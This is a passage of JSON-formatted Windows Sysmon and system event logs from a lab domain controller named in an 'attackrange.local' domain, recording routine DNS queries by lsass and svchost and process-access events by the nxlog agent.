06:49:39.253","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2577,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.258\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.258","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2578,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.262\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.262","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2579,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.269\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.269","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2580,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.274\r\nProcessGuid: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.274","ProcessGuid":"{E2A3D6B1-1058-5F25-0000-001012540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:41.004\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:41.004","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":37,"SourceName":"Microsoft-Windows-Time-Service","ProviderGuid":"{06EDCFEB-0FD0-4E53-ACCA-A6F8BBF81BCB}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76840,"ProcessID":1196,"ThreadID":2256,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"The time provider NtpClient is currently receiving valid time data from time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123->13.86.101.172:123).","Opcode":"Info","TimeSource":"time.windows.com,0x8 (ntp.m|0x8|0.0.0.0:123-&gt;13.86.101.172:123)","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2582,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.323\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::49e:253e:f5ff:fef1;fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.323","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::49e:253e:f5ff:fef1;fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2583,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.413\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: oqooutrf\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.413","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"oqooutrf","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2584,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.414\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::49e:253e:f5ff:fef1;fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.414","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::49e:253e:f5ff:fef1;fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2585,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.415\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.415","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2586,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.432\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nProcessId: 1140\r\nQueryName: isatap.us-east-2.compute.internal\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.432","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","QueryName":"isatap.us-east-2.compute.internal","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:42.020\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:42.020","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2588,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:39.773\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nProcessId: 1196\r\nQueryName: wpad\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:39.773","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-001015C40000}","QueryName":"wpad","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2589,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:40.598\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nProcessId: 1336\r\nQueryName: win-dc-8400769\r\nQueryStatus: 1460\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:49:40.598","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","QueryName":"win-dc-8400769","QueryStatus":"1460","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 06:49:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2590,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:42.770\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:42.770","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31375|C:\\Windows\\system32\\lsasrv.dll+2f20b|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
